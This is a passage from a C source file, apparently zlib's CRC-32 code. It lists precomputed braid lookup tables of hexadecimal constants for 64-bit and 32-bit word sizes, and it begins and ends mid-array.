0x9fc98ace00000000, 0x7d34024300000000, 0x51c95a5500000000, 0xb334d2d800000000, 0xd4343a9500000000, 0x36c9b21800000000, 0x8cce8bb900000000, 0x6e33033400000000, 0x0933eb7900000000, 0xebce63f400000000, 0xc7333be200000000, 0x25ceb36f00000000, 0x42ce5b2200000000, 0xa033d3af00000000, 0xec274c0b00000000, 0x0edac48600000000, 0x69da2ccb00000000, 0x8b27a44600000000, 0xa7dafc5000000000, 0x452774dd00000000, 0x22279c9000000000, 0xc0da141d00000000, 0x7add2dbc00000000, 0x9820a53100000000, 0xff204d7c00000000, 0x1dddc5f100000000, 0x31209de700000000, 0xd3dd156a00000000, 0xb4ddfd2700000000, 0x562075aa00000000, 0x81d4febe00000000, 0x6329763300000000, 0x04299e7e00000000, 0xe6d416f300000000, 0xca294ee500000000, 0x28d4c66800000000, 0x4fd42e2500000000, 0xad29a6a800000000, 0x172e9f0900000000, 0xf5d3178400000000, 0x92d3ffc900000000, 0x702e774400000000, 0x5cd32f5200000000, 0xbe2ea7df00000000, 0xd92e4f9200000000, 0x3bd3c71f00000000, 0xaf88c0ad00000000, 0x4d75482000000000, 0x2a75a06d00000000, 0xc88828e000000000, 0xe47570f600000000, 0x0688f87b00000000, 0x6188103600000000, 0x837598bb00000000, 0x3972a11a00000000, 0xdb8f299700000000, 0xbc8fc1da00000000, 0x5e72495700000000, 0x728f114100000000, 0x907299cc00000000, 0xf772718100000000, 0x158ff90c00000000, 0xc27b721800000000, 0x2086fa9500000000, 0x478612d800000000, 0xa57b9a5500000000, 0x8986c24300000000, 0x6b7b4ace00000000, 0x0c7ba28300000000, 0xee862a0e00000000, 0x548113af00000000, 0xb67c9b2200000000, 0xd17c736f00000000, 0x3381fbe200000000, 0x1f7ca3f400000000, 0xfd812b7900000000, 0x9a81c33400000000, 0x787c4bb900000000, 0x3468d41d00000000, 0xd6955c9000000000, 0xb195b4dd00000000, 0x53683c5000000000, 0x7f95644600000000, 0x9d68eccb00000000, 0xfa68048600000000, 0x18958c0b00000000, 0xa292b5aa00000000, 0x406f3d2700000000, 0x276fd56a00000000, 0xc5925de700000000, 0xe96f05f100000000, 0x0b928d7c00000000, 0x6c92653100000000, 0x8e6fedbc00000000, 0x599b66a800000000, 0xbb66ee2500000000, 0xdc66066800000000, 0x3e9b8ee500000000, 0x1266d6f300000000, 0xf09b5e7e00000000, 0x979bb63300000000, 0x75663ebe00000000, 0xcf61071f00000000, 0x2d9c8f9200000000, 0x4a9c67df00000000, 0xa861ef5200000000, 0x849cb74400000000, 0x66613fc900000000, 0x0161d78400000000, 0xe39c5f0900000000, 0xd84f981600000000, 0x3ab2109b00000000, 0x5db2f8d600000000, 0xbf4f705b00000000, 0x93b2284d00000000, 0x714fa0c000000000, 0x164f488d00000000, 0xf4b2c00000000000, 0x4eb5f9a100000000, 0xac48712c00000000, 0xcb48996100000000, 0x29b511ec00000000, 0x054849fa00000000, 0xe7b5c17700000000, 0x80b5293a00000000, 0x6248a1b700000000, 0xb5bc2aa300000000, 0x5741a22e00000000, 0x30414a6300000000, 0xd2bcc2ee00000000, 0xfe419af800000000, 0x1cbc127500000000, 0x7bbcfa3800000000, 0x994172b500000000, 0x23464b1400000000, 0xc1bbc39900000000, 0xa6bb2bd400000000, 0x4446a35900000000, 0x68bbfb4f00000000, 0x8a4673c200000000, 0xed469b8f00000000, 0x0fbb130200000000, 0x43af8ca600000000, 0xa152042b00000000, 0xc652ec6600000000, 0x24af64eb00000000, 0x08523cfd00000000, 0xeaafb47000000000, 0x8daf5c3d00000000, 0x6f52d4b000000000, 0xd555ed1100000000, 0x37a8659c00000000, 0x50a88dd100000000, 0xb255055c00000000, 0x9ea85d4a00000000, 0x7c55d5c700000000, 0x1b553d8a00000000, 0xf9a8b50700000000, 0x2e5c3e1300000000, 0xcca1b69e00000000, 0xaba15ed300000000, 0x495cd65e00000000, 0x65a18e4800000000, 0x875c06c500000000, 0xe05cee8800000000, 0x02a1660500000000, 0xb8a65fa400000000, 0x5a5bd72900000000, 0x3d5b3f6400000000, 0xdfa6b7e900000000, 0xf35befff00000000, 0x11a6677200000000, 0x76a68f3f00000000, 0x945b07b200000000}, {0x0000000000000000, 0xa90b894e00000000, 0x5217129d00000000, 0xfb1c9bd300000000, 0xe52855e100000000, 0x4c23dcaf00000000, 0xb73f477c00000000, 0x1e34ce3200000000, 0x8b57db1900000000, 0x225c525700000000, 0xd940c98400000000, 0x704b40ca00000000, 0x6e7f8ef800000000, 0xc77407b600000000, 0x3c689c6500000000, 0x9563152b00000000, 0x16afb63300000000, 0xbfa43f7d00000000, 0x44b8a4ae00000000, 0xedb32de000000000, 0xf387e3d200000000, 0x5a8c6a9c00000000, 0xa190f14f00000000, 0x089b780100000000, 0x9df86d2a00000000, 0x34f3e46400000000, 0xcfef7fb700000000, 0x66e4f6f900000000, 0x78d038cb00000000, 0xd1dbb18500000000, 0x2ac72a5600000000, 0x83cca31800000000, 0x2c5e6d6700000000, 0x8555e42900000000, 0x7e497ffa00000000, 0xd742f6b400000000, 0xc976388600000000, 0x607db1c800000000, 0x9b612a1b00000000, 0x326aa35500000000, 0xa709b67e00000000, 0x0e023f3000000000, 0xf51ea4e300000000, 0x5c152dad00000000, 0x4221e39f00000000, 0xeb2a6ad100000000, 0x1036f10200000000, 0xb93d784c00000000, 0x3af1db5400000000, 0x93fa521a00000000, 0x68e6c9c900000000, 0xc1ed408700000000, 0xdfd98eb500000000, 0x76d207fb00000000, 0x8dce9c2800000000, 0x24c5156600000000, 0xb1a6004d00000000, 0x18ad890300000000, 0xe3b112d000000000, 0x4aba9b9e00000000, 0x548e55ac00000000, 0xfd85dce200000000, 0x0699473100000000, 0xaf92ce7f00000000, 0x58bcdace00000000, 0xf1b7538000000000, 0x0aabc85300000000, 0xa3a0411d00000000, 0xbd948f2f00000000, 0x149f066100000000, 0xef839db200000000, 0x468814fc00000000, 0xd3eb01d700000000, 0x7ae0889900000000, 0x81fc134a00000000, 0x28f79a0400000000, 0x36c3543600000000, 0x9fc8dd7800000000, 0x64d446ab00000000, 0xcddfcfe500000000, 0x4e136cfd00000000, 0xe718e5b300000000, 0x1c047e6000000000, 0xb50ff72e00000000, 0xab3b391c00000000, 0x0230b05200000000, 0xf92c2b8100000000, 0x5027a2cf00000000, 0xc544b7e400000000, 0x6c4f3eaa00000000, 0x9753a57900000000, 0x3e582c3700000000, 0x206ce20500000000, 0x89676b4b00000000, 0x727bf09800000000, 0xdb7079d600000000, 0x74e2b7a900000000, 0xdde93ee700000000, 0x26f5a53400000000, 0x8ffe2c7a00000000, 0x91cae24800000000, 0x38c16b0600000000, 0xc3ddf0d500000000, 0x6ad6799b00000000, 0xffb56cb000000000, 0x56bee5fe00000000, 0xada27e2d00000000, 0x04a9f76300000000, 0x1a9d395100000000, 0xb396b01f00000000, 0x488a2bcc00000000, 0xe181a28200000000, 0x624d019a00000000, 0xcb4688d400000000, 0x305a130700000000, 0x99519a4900000000, 0x8765547b00000000, 0x2e6edd3500000000, 0xd57246e600000000, 0x7c79cfa800000000, 0xe91ada8300000000, 0x401153cd00000000, 0xbb0dc81e00000000, 0x1206415000000000, 0x0c328f6200000000, 0xa539062c00000000, 0x5e259dff00000000, 0xf72e14b100000000, 0xf17ec44600000000, 0x58754d0800000000, 0xa369d6db00000000, 0x0a625f9500000000, 0x145691a700000000, 0xbd5d18e900000000, 0x4641833a00000000, 0xef4a0a7400000000, 0x7a291f5f00000000, 0xd322961100000000, 0x283e0dc200000000, 0x8135848c00000000, 0x9f014abe00000000, 0x360ac3f000000000, 0xcd16582300000000, 0x641dd16d00000000, 0xe7d1727500000000, 0x4edafb3b00000000, 0xb5c660e800000000, 0x1ccde9a600000000, 0x02f9279400000000, 0xabf2aeda00000000, 0x50ee350900000000, 0xf9e5bc4700000000, 0x6c86a96c00000000, 0xc58d202200000000, 0x3e91bbf100000000, 0x979a32bf00000000, 0x89aefc8d00000000, 0x20a575c300000000, 0xdbb9ee1000000000, 0x72b2675e00000000, 0xdd20a92100000000, 0x742b206f00000000, 0x8f37bbbc00000000, 0x263c32f200000000, 0x3808fcc000000000, 0x9103758e00000000, 0x6a1fee5d00000000, 0xc314671300000000, 0x5677723800000000, 0xff7cfb7600000000, 0x046060a500000000, 0xad6be9eb00000000, 0xb35f27d900000000, 0x1a54ae9700000000, 0xe148354400000000, 0x4843bc0a00000000, 0xcb8f1f1200000000, 0x6284965c00000000, 0x99980d8f00000000, 0x309384c100000000, 0x2ea74af300000000, 0x87acc3bd00000000, 0x7cb0586e00000000, 0xd5bbd12000000000, 0x40d8c40b00000000, 0xe9d34d4500000000, 0x12cfd69600000000, 0xbbc45fd800000000, 0xa5f091ea00000000, 0x0cfb18a400000000, 0xf7e7837700000000, 0x5eec0a3900000000, 0xa9c21e8800000000, 0x00c997c600000000, 0xfbd50c1500000000, 0x52de855b00000000, 0x4cea4b6900000000, 0xe5e1c22700000000, 0x1efd59f400000000, 0xb7f6d0ba00000000, 0x2295c59100000000, 0x8b9e4cdf00000000, 0x7082d70c00000000, 0xd9895e4200000000, 0xc7bd907000000000, 0x6eb6193e00000000, 0x95aa82ed00000000, 0x3ca10ba300000000, 0xbf6da8bb00000000, 0x166621f500000000, 0xed7aba2600000000, 0x4471336800000000, 0x5a45fd5a00000000, 0xf34e741400000000, 0x0852efc700000000, 0xa159668900000000, 0x343a73a200000000, 0x9d31faec00000000, 0x662d613f00000000, 0xcf26e87100000000, 0xd112264300000000, 0x7819af0d00000000, 0x830534de00000000, 0x2a0ebd9000000000, 0x859c73ef00000000, 0x2c97faa100000000, 0xd78b617200000000, 0x7e80e83c00000000, 0x60b4260e00000000, 0xc9bfaf4000000000, 0x32a3349300000000, 0x9ba8bddd00000000, 0x0ecba8f600000000, 0xa7c021b800000000, 0x5cdcba6b00000000, 0xf5d7332500000000, 0xebe3fd1700000000, 0x42e8745900000000, 0xb9f4ef8a00000000, 0x10ff66c400000000, 0x9333c5dc00000000, 0x3a384c9200000000, 0xc124d74100000000, 0x682f5e0f00000000, 0x761b903d00000000, 0xdf10197300000000, 0x240c82a000000000, 0x8d070bee00000000, 0x18641ec500000000, 0xb16f978b00000000, 0x4a730c5800000000, 0xe378851600000000, 0xfd4c4b2400000000, 0x5447c26a00000000, 0xaf5b59b900000000, 0x0650d0f700000000}, {0x0000000000000000, 0x479244af00000000, 0xcf22f88500000000, 0x88b0bc2a00000000, 0xdf4381d000000000, 0x98d1c57f00000000, 0x1061795500000000, 0x57f33dfa00000000, 0xff81737a00000000, 0xb81337d500000000, 0x30a38bff00000000, 0x7731cf5000000000, 0x20c2f2aa00000000, 0x6750b60500000000, 0xefe00a2f00000000, 0xa8724e8000000000, 0xfe03e7f400000000, 0xb991a35b00000000, 0x31211f7100000000, 0x76b35bde00000000, 0x2140662400000000, 0x66d2228b00000000, 0xee629ea100000000, 0xa9f0da0e00000000, 0x0182948e00000000, 0x4610d02100000000, 0xcea06c0b00000000, 0x893228a400000000, 0xdec1155e00000000, 0x995351f100000000, 0x11e3eddb00000000, 0x5671a97400000000, 0xbd01bf3200000000, 0xfa93fb9d00000000, 0x722347b700000000, 0x35b1031800000000, 0x62423ee200000000, 0x25d07a4d00000000, 0xad60c66700000000, 0xeaf282c800000000, 0x4280cc4800000000, 0x051288e700000000, 0x8da234cd00000000, 0xca30706200000000, 0x9dc34d9800000000, 0xda51093700000000, 0x52e1b51d00000000, 0x1573f1b200000000, 0x430258c600000000, 0x04901c6900000000, 0x8c20a04300000000, 0xcbb2e4ec00000000, 0x9c41d91600000000, 0xdbd39db900000000, 0x5363219300000000, 0x14f1653c00000000, 0xbc832bbc00000000, 0xfb116f1300000000, 0x73a1d33900000000, 0x3433979600000000, 0x63c0aa6c00000000, 0x2452eec300000000, 0xace252e900000000, 0xeb70164600000000, 0x7a037e6500000000, 0x3d913aca00000000, 0xb52186e000000000, 0xf2b3c24f00000000, 0xa540ffb500000000, 0xe2d2bb1a00000000, 0x6a62073000000000, 0x2df0439f00000000, 0x85820d1f00000000, 0xc21049b000000000, 0x4aa0f59a00000000, 0x0d32b13500000000, 0x5ac18ccf00000000, 0x1d53c86000000000, 0x95e3744a00000000, 0xd27130e500000000, 0x8400999100000000, 0xc392dd3e00000000, 0x4b22611400000000, 0x0cb025bb00000000, 0x5b43184100000000, 0x1cd15cee00000000, 0x9461e0c400000000, 0xd3f3a46b00000000, 0x7b81eaeb00000000, 0x3c13ae4400000000, 0xb4a3126e00000000, 0xf33156c100000000, 0xa4c26b3b00000000, 0xe3502f9400000000, 0x6be093be00000000, 0x2c72d71100000000, 0xc702c15700000000, 0x809085f800000000, 0x082039d200000000, 0x4fb27d7d00000000, 0x1841408700000000, 0x5fd3042800000000, 0xd763b80200000000, 0x90f1fcad00000000, 0x3883b22d00000000, 0x7f11f68200000000, 0xf7a14aa800000000, 0xb0330e0700000000, 0xe7c033fd00000000, 0xa052775200000000, 0x28e2cb7800000000, 0x6f708fd700000000, 0x390126a300000000, 0x7e93620c00000000, 0xf623de2600000000, 0xb1b19a8900000000, 0xe642a77300000000, 0xa1d0e3dc00000000, 0x29605ff600000000, 0x6ef21b5900000000, 0xc68055d900000000, 0x8112117600000000, 0x09a2ad5c00000000, 0x4e30e9f300000000, 0x19c3d40900000000, 0x5e5190a600000000, 0xd6e12c8c00000000, 0x9173682300000000, 0xf406fcca00000000, 0xb394b86500000000, 0x3b24044f00000000, 0x7cb640e000000000, 0x2b457d1a00000000, 0x6cd739b500000000, 0xe467859f00000000, 0xa3f5c13000000000, 0x0b878fb000000000, 0x4c15cb1f00000000, 0xc4a5773500000000, 0x8337339a00000000, 0xd4c40e6000000000, 0x93564acf00000000, 0x1be6f6e500000000, 0x5c74b24a00000000, 0x0a051b3e00000000, 0x4d975f9100000000, 0xc527e3bb00000000, 0x82b5a71400000000, 0xd5469aee00000000, 0x92d4de4100000000, 0x1a64626b00000000, 0x5df626c400000000, 0xf584684400000000, 0xb2162ceb00000000, 0x3aa690c100000000, 0x7d34d46e00000000, 0x2ac7e99400000000, 0x6d55ad3b00000000, 0xe5e5111100000000, 0xa27755be00000000, 0x490743f800000000, 0x0e95075700000000, 0x8625bb7d00000000, 0xc1b7ffd200000000, 0x9644c22800000000, 0xd1d6868700000000, 0x59663aad00000000, 0x1ef47e0200000000, 0xb686308200000000, 0xf114742d00000000, 0x79a4c80700000000, 0x3e368ca800000000, 0x69c5b15200000000, 0x2e57f5fd00000000, 0xa6e749d700000000, 0xe1750d7800000000, 0xb704a40c00000000, 0xf096e0a300000000, 0x78265c8900000000, 0x3fb4182600000000, 0x684725dc00000000, 0x2fd5617300000000, 0xa765dd5900000000, 0xe0f799f600000000, 0x4885d77600000000, 0x0f1793d900000000, 0x87a72ff300000000, 0xc0356b5c00000000, 0x97c656a600000000, 0xd054120900000000, 0x58e4ae2300000000, 0x1f76ea8c00000000, 0x8e0582af00000000, 0xc997c60000000000, 0x41277a2a00000000, 0x06b53e8500000000, 0x5146037f00000000, 0x16d447d000000000, 0x9e64fbfa00000000, 0xd9f6bf5500000000, 0x7184f1d500000000, 0x3616b57a00000000, 0xbea6095000000000, 0xf9344dff00000000, 0xaec7700500000000, 0xe95534aa00000000, 0x61e5888000000000, 0x2677cc2f00000000, 0x7006655b00000000, 0x379421f400000000, 0xbf249dde00000000, 0xf8b6d97100000000, 0xaf45e48b00000000, 0xe8d7a02400000000, 0x60671c0e00000000, 0x27f558a100000000, 0x8f87162100000000, 0xc815528e00000000, 0x40a5eea400000000, 0x0737aa0b00000000, 0x50c497f100000000, 0x1756d35e00000000, 0x9fe66f7400000000, 0xd8742bdb00000000, 0x33043d9d00000000, 0x7496793200000000, 0xfc26c51800000000, 0xbbb481b700000000, 0xec47bc4d00000000, 0xabd5f8e200000000, 0x236544c800000000, 0x64f7006700000000, 0xcc854ee700000000, 0x8b170a4800000000, 0x03a7b66200000000, 0x4435f2cd00000000, 0x13c6cf3700000000, 0x54548b9800000000, 0xdce437b200000000, 0x9b76731d00000000, 0xcd07da6900000000, 0x8a959ec600000000, 0x022522ec00000000, 0x45b7664300000000, 0x12445bb900000000, 0x55d61f1600000000, 0xdd66a33c00000000, 0x9af4e79300000000, 0x3286a91300000000, 0x7514edbc00000000, 0xfda4519600000000, 0xba36153900000000, 0xedc528c300000000, 0xaa576c6c00000000, 0x22e7d04600000000, 0x657594e900000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x65673b46, 0xcace768c, 0xafa94dca, 0x4eedeb59, 0x2b8ad01f, 0x84239dd5, 0xe144a693, 0x9ddbd6b2, 0xf8bcedf4, 0x5715a03e, 0x32729b78, 0xd3363deb, 0xb65106ad, 0x19f84b67, 0x7c9f7021, 0xe0c6ab25, 0x85a19063, 0x2a08dda9, 0x4f6fe6ef, 0xae2b407c, 0xcb4c7b3a, 0x64e536f0, 0x01820db6, 0x7d1d7d97, 0x187a46d1, 0xb7d30b1b, 0xd2b4305d, 0x33f096ce, 0x5697ad88, 0xf93ee042, 0x9c59db04, 0x1afc500b, 0x7f9b6b4d, 0xd0322687, 0xb5551dc1, 0x5411bb52, 0x31768014, 0x9edfcdde, 0xfbb8f698, 0x872786b9, 0xe240bdff, 0x4de9f035, 0x288ecb73, 0xc9ca6de0, 0xacad56a6, 0x03041b6c, 0x6663202a, 0xfa3afb2e, 0x9f5dc068, 0x30f48da2, 0x5593b6e4, 0xb4d71077, 0xd1b02b31, 0x7e1966fb, 0x1b7e5dbd, 0x67e12d9c, 0x028616da, 0xad2f5b10, 0xc8486056, 0x290cc6c5, 0x4c6bfd83, 0xe3c2b049, 0x86a58b0f, 0x35f8a016, 0x509f9b50, 0xff36d69a, 0x9a51eddc, 0x7b154b4f, 0x1e727009, 0xb1db3dc3, 0xd4bc0685, 0xa82376a4, 0xcd444de2, 0x62ed0028, 0x078a3b6e, 0xe6ce9dfd, 0x83a9a6bb, 0x2c00eb71, 0x4967d037, 0xd53e0b33, 0xb0593075, 0x1ff07dbf, 0x7a9746f9, 0x9bd3e06a, 0xfeb4db2c, 0x511d96e6, 0x347aada0, 0x48e5dd81, 0x2d82e6c7, 0x822bab0d, 0xe74c904b, 0x060836d8, 0x636f0d9e, 0xccc64054, 0xa9a17b12, 0x2f04f01d, 0x4a63cb5b, 0xe5ca8691, 0x80adbdd7, 0x61e91b44, 0x048e2002, 0xab276dc8, 0xce40568e, 0xb2df26af, 0xd7b81de9, 0x78115023, 0x1d766b65, 0xfc32cdf6, 0x9955f6b0, 0x36fcbb7a, 0x539b803c, 0xcfc25b38, 0xaaa5607e, 0x050c2db4, 0x606b16f2, 0x812fb061, 0xe4488b27, 0x4be1c6ed, 0x2e86fdab, 0x52198d8a, 0x377eb6cc, 0x98d7fb06, 0xfdb0c040, 0x1cf466d3, 0x79935d95, 0xd63a105f, 0xb35d2b19, 0x6bf1402c, 0x0e967b6a, 0xa13f36a0, 0xc4580de6, 0x251cab75, 0x407b9033, 0xefd2ddf9, 0x8ab5e6bf, 0xf62a969e, 0x934dadd8, 0x3ce4e012, 0x5983db54, 0xb8c77dc7, 0xdda04681, 0x72090b4b, 0x176e300d, 0x8b37eb09, 0xee50d04f, 0x41f99d85, 0x249ea6c3, 0xc5da0050, 0xa0bd3b16, 0x0f1476dc, 0x6a734d9a, 0x16ec3dbb, 0x738b06fd, 0xdc224b37, 0xb9457071, 0x5801d6e2, 0x3d66eda4, 0x92cfa06e, 0xf7a89b28, 0x710d1027, 0x146a2b61, 0xbbc366ab, 0xdea45ded, 0x3fe0fb7e, 0x5a87c038, 0xf52e8df2, 0x9049b6b4, 0xecd6c695, 0x89b1fdd3, 0x2618b019, 0x437f8b5f, 0xa23b2dcc, 0xc75c168a, 0x68f55b40, 0x0d926006, 0x91cbbb02, 0xf4ac8044, 0x5b05cd8e, 0x3e62f6c8, 0xdf26505b, 0xba416b1d, 0x15e826d7, 0x708f1d91, 0x0c106db0, 0x697756f6, 0xc6de1b3c, 0xa3b9207a, 0x42fd86e9, 0x279abdaf, 0x8833f065, 0xed54cb23, 0x5e09e03a, 0x3b6edb7c, 0x94c796b6, 0xf1a0adf0, 0x10e40b63, 0x75833025, 0xda2a7def, 0xbf4d46a9, 0xc3d23688, 0xa6b50dce, 0x091c4004, 0x6c7b7b42, 0x8d3fddd1, 0xe858e697, 0x47f1ab5d, 0x2296901b, 0xbecf4b1f, 0xdba87059, 0x74013d93, 0x116606d5, 0xf022a046, 0x95459b00, 0x3aecd6ca, 0x5f8bed8c, 0x23149dad, 0x4673a6eb, 0xe9daeb21, 0x8cbdd067, 0x6df976f4, 0x089e4db2, 0xa7370078, 0xc2503b3e, 0x44f5b031, 0x21928b77, 0x8e3bc6bd, 0xeb5cfdfb, 0x0a185b68, 0x6f7f602e, 0xc0d62de4, 0xa5b116a2, 0xd92e6683, 0xbc495dc5, 0x13e0100f, 0x76872b49, 0x97c38dda, 0xf2a4b69c, 0x5d0dfb56, 0x386ac010, 0xa4331b14, 0xc1542052, 0x6efd6d98, 0x0b9a56de, 0xeadef04d, 0x8fb9cb0b, 0x201086c1, 0x4577bd87, 0x39e8cda6, 0x5c8ff6e0, 0xf326bb2a, 0x9641806c, 0x770526ff, 0x12621db9, 0xbdcb5073, 0xd8ac6b35}, {0x00000000, 0xd7e28058, 0x74b406f1, 0xa35686a9, 0xe9680de2, 0x3e8a8dba, 0x9ddc0b13, 0x4a3e8b4b, 0x09a11d85, 0xde439ddd, 0x7d151b74, 0xaaf79b2c, 0xe0c91067, 0x372b903f, 0x947d1696, 0x439f96ce, 0x13423b0a, 0xc4a0bb52, 0x67f63dfb, 0xb014bda3, 0xfa2a36e8, 0x2dc8b6b0, 0x8e9e3019, 0x597cb041, 0x1ae3268f, 0xcd01a6d7, 0x6e57207e, 0xb9b5a026, 0xf38b2b6d, 0x2469ab35, 0x873f2d9c, 0x50ddadc4, 0x26847614, 0xf166f64c, 0x523070e5, 0x85d2f0bd, 0xcfec7bf6, 0x180efbae, 0xbb587d07, 0x6cbafd5f, 0x2f256b91, 0xf8c7ebc9, 0x5b916d60, 0x8c73ed38, 0xc64d6673, 0x11afe62b, 0xb2f96082, 0x651be0da, 0x35c64d1e, 0xe224cd46, 0x41724bef, 0x9690cbb7, 0xdcae40fc, 0x0b4cc0a4, 0xa81a460d, 0x7ff8c655, 0x3c67509b, 0xeb85d0c3, 0x48d3566a, 0x9f31d632, 0xd50f5d79, 0x02eddd21, 0xa1bb5b88, 0x7659dbd0, 0x4d08ec28, 0x9aea6c70, 0x39bcead9, 0xee5e6a81, 0xa460e1ca, 0x73826192, 0xd0d4e73b, 0x07366763, 0x44a9f1ad, 0x934b71f5, 0x301df75c, 0xe7ff7704, 0xadc1fc4f, 0x7a237c17, 0xd975fabe, 0x0e977ae6, 0x5e4ad722, 0x89a8577a, 0x2afed1d3, 0xfd1c518b, 0xb722dac0, 0x60c05a98, 0xc396dc31, 0x14745c69, 0x57ebcaa7, 0x80094aff, 0x235fcc56, 0xf4bd4c0e, 0xbe83c745, 0x6961471d, 0xca37c1b4, 0x1dd541ec, 0x6b8c9a3c, 0xbc6e1a64, 0x1f389ccd, 0xc8da1c95, 0x82e497de, 0x55061786, 0xf650912f, 0x21b21177, 0x622d87b9, 0xb5cf07e1, 0x16998148, 0xc17b0110, 0x8b458a5b, 0x5ca70a03, 0xfff18caa, 0x28130cf2, 0x78cea136, 0xaf2c216e, 0x0c7aa7c7, 0xdb98279f, 0x91a6acd4, 0x46442c8c, 0xe512aa25, 0x32f02a7d, 0x716fbcb3, 0xa68d3ceb, 0x05dbba42, 0xd2393a1a, 0x9807b151, 0x4fe53109, 0xecb3b7a0, 0x3b5137f8, 0x9a11d850, 0x4df35808, 0xeea5dea1, 0x39475ef9, 0x7379d5b2, 0xa49b55ea, 0x07cdd343, 0xd02f531b, 0x93b0c5d5, 0x4452458d, 0xe704c324, 0x30e6437c, 0x7ad8c837, 0xad3a486f, 0x0e6ccec6, 0xd98e4e9e, 0x8953e35a, 0x5eb16302, 0xfde7e5ab, 0x2a0565f3, 0x603beeb8, 0xb7d96ee0, 0x148fe849, 0xc36d6811, 0x80f2fedf, 0x57107e87, 0xf446f82e, 0x23a47876, 0x699af33d, 0xbe787365, 0x1d2ef5cc, 0xcacc7594, 0xbc95ae44, 0x6b772e1c, 0xc821a8b5, 0x1fc328ed, 0x55fda3a6, 0x821f23fe, 0x2149a557, 0xf6ab250f, 0xb534b3c1, 0x62d63399, 0xc180b530, 0x16623568, 0x5c5cbe23, 0x8bbe3e7b, 0x28e8b8d2, 0xff0a388a, 0xafd7954e, 0x78351516, 0xdb6393bf, 0x0c8113e7, 0x46bf98ac, 0x915d18f4, 0x320b9e5d, 0xe5e91e05, 0xa67688cb, 0x71940893, 0xd2c28e3a, 0x05200e62, 0x4f1e8529, 0x98fc0571, 0x3baa83d8, 0xec480380, 0xd7193478, 0x00fbb420, 0xa3ad3289, 0x744fb2d1, 0x3e71399a, 0xe993b9c2, 0x4ac53f6b, 0x9d27bf33, 0xdeb829fd, 0x095aa9a5, 0xaa0c2f0c, 0x7deeaf54, 0x37d0241f, 0xe032a447, 0x436422ee, 0x9486a2b6, 0xc45b0f72, 0x13b98f2a, 0xb0ef0983, 0x670d89db, 0x2d330290, 0xfad182c8, 0x59870461, 0x8e658439, 0xcdfa12f7, 0x1a1892af, 0xb94e1406, 0x6eac945e, 0x24921f15, 0xf3709f4d, 0x502619e4, 0x87c499bc, 0xf19d426c, 0x267fc234, 0x8529449d, 0x52cbc4c5, 0x18f54f8e, 0xcf17cfd6, 0x6c41497f, 0xbba3c927, 0xf83c5fe9, 0x2fdedfb1, 0x8c885918, 0x5b6ad940, 0x1154520b, 0xc6b6d253, 0x65e054fa, 0xb202d4a2, 0xe2df7966, 0x353df93e, 0x966b7f97, 0x4189ffcf, 0x0bb77484, 0xdc55f4dc, 0x7f037275, 0xa8e1f22d, 0xeb7e64e3, 0x3c9ce4bb, 0x9fca6212, 0x4828e24a, 0x02166901, 0xd5f4e959, 0x76a26ff0, 0xa140efa8}, {0x00000000, 0xef52b6e1, 0x05d46b83, 0xea86dd62, 0x0ba8d706, 0xe4fa61e7, 0x0e7cbc85, 0xe12e0a64, 0x1751ae0c, 0xf80318ed, 0x1285c58f, 0xfdd7736e, 0x1cf9790a, 0xf3abcfeb, 0x192d1289, 0xf67fa468, 0x2ea35c18, 0xc1f1eaf9, 0x2b77379b, 0xc425817a, 0x250b8b1e, 0xca593dff, 0x20dfe09d, 0xcf8d567c, 0x39f2f214, 0xd6a044f5, 0x3c269997, 0xd3742f76, 0x325a2512, 0xdd0893f3, 0x378e4e91, 0xd8dcf870, 0x5d46b830, 0xb2140ed1, 0x5892d3b3, 0xb7c06552, 0x56ee6f36, 0xb9bcd9d7, 0x533a04b5, 0xbc68b254, 0x4a17163c, 0xa545a0dd, 0x4fc37dbf, 0xa091cb5e, 0x41bfc13a, 0xaeed77db, 0x446baab9, 0xab391c58, 0x73e5e428, 0x9cb752c9, 0x76318fab, 0x9963394a, 0x784d332e, 0x971f85cf, 0x7d9958ad, 0x92cbee4c, 0x64b44a24, 0x8be6fcc5, 0x616021a7, 0x8e329746, 0x6f1c9d22, 0x804e2bc3, 0x6ac8f6a1, 0x859a4040, 0xba8d7060, 0x55dfc681, 0xbf591be3, 0x500bad02, 0xb125a766, 0x5e771187, 0xb4f1cce5, 0x5ba37a04, 0xaddcde6c, 0x428e688d, 0xa808b5ef, 0x475a030e, 0xa674096a, 0x4926bf8b, 0xa3a062e9, 0x4cf2d408, 0x942e2c78, 0x7b7c9a99, 0x91fa47fb, 0x7ea8f11a, 0x9f86fb7e, 0x70d44d9f, 0x9a5290fd, 0x7500261c, 0x837f8274, 0x6c2d3495, 0x86abe9f7, 0x69f95f16, 0x88d75572, 0x6785e393, 0x8d033ef1, 0x62518810, 0xe7cbc850, 0x08997eb1, 0xe21fa3d3, 0x0d4d1532, 0xec631f56, 0x0331a9b7, 0xe9b774d5, 0x06e5c234, 0xf09a665c, 0x1fc8d0bd, 0xf54e0ddf, 0x1a1cbb3e, 0xfb32b15a, 0x146007bb, 0xfee6dad9, 0x11b46c38, 0xc9689448, 0x263a22a9, 0xccbcffcb, 0x23ee492a, 0xc2c0434e, 0x2d92f5af, 0xc71428cd, 0x28469e2c, 0xde393a44, 0x316b8ca5, 0xdbed51c7, 0x34bfe726, 0xd591ed42, 0x3ac35ba3, 0xd04586c1, 0x3f173020, 0xae6be681, 0x41395060, 0xabbf8d02, 0x44ed3be3, 0xa5c33187, 0x4a918766, 0xa0175a04, 0x4f45ece5, 0xb93a488d, 0x5668fe6c, 0xbcee230e, 0x53bc95ef, 0xb2929f8b, 0x5dc0296a, 0xb746f408, 0x581442e9, 0x80c8ba99, 0x6f9a0c78, 0x851cd11a, 0x6a4e67fb, 0x8b606d9f, 0x6432db7e, 0x8eb4061c, 0x61e6b0fd, 0x97991495, 0x78cba274, 0x924d7f16, 0x7d1fc9f7, 0x9c31c393, 0x73637572, 0x99e5a810, 0x76b71ef1, 0xf32d5eb1, 0x1c7fe850, 0xf6f93532, 0x19ab83d3, 0xf88589b7, 0x17d73f56, 0xfd51e234, 0x120354d5, 0xe47cf0bd, 0x0b2e465c, 0xe1a89b3e, 0x0efa2ddf, 0xefd427bb, 0x0086915a, 0xea004c38, 0x0552fad9, 0xdd8e02a9, 0x32dcb448, 0xd85a692a, 0x3708dfcb, 0xd626d5af, 0x3974634e, 0xd3f2be2c, 0x3ca008cd, 0xcadfaca5, 0x258d1a44, 0xcf0bc726, 0x205971c7, 0xc1777ba3, 0x2e25cd42, 0xc4a31020, 0x2bf1a6c1, 0x14e696e1, 0xfbb42000, 0x1132fd62, 0xfe604b83, 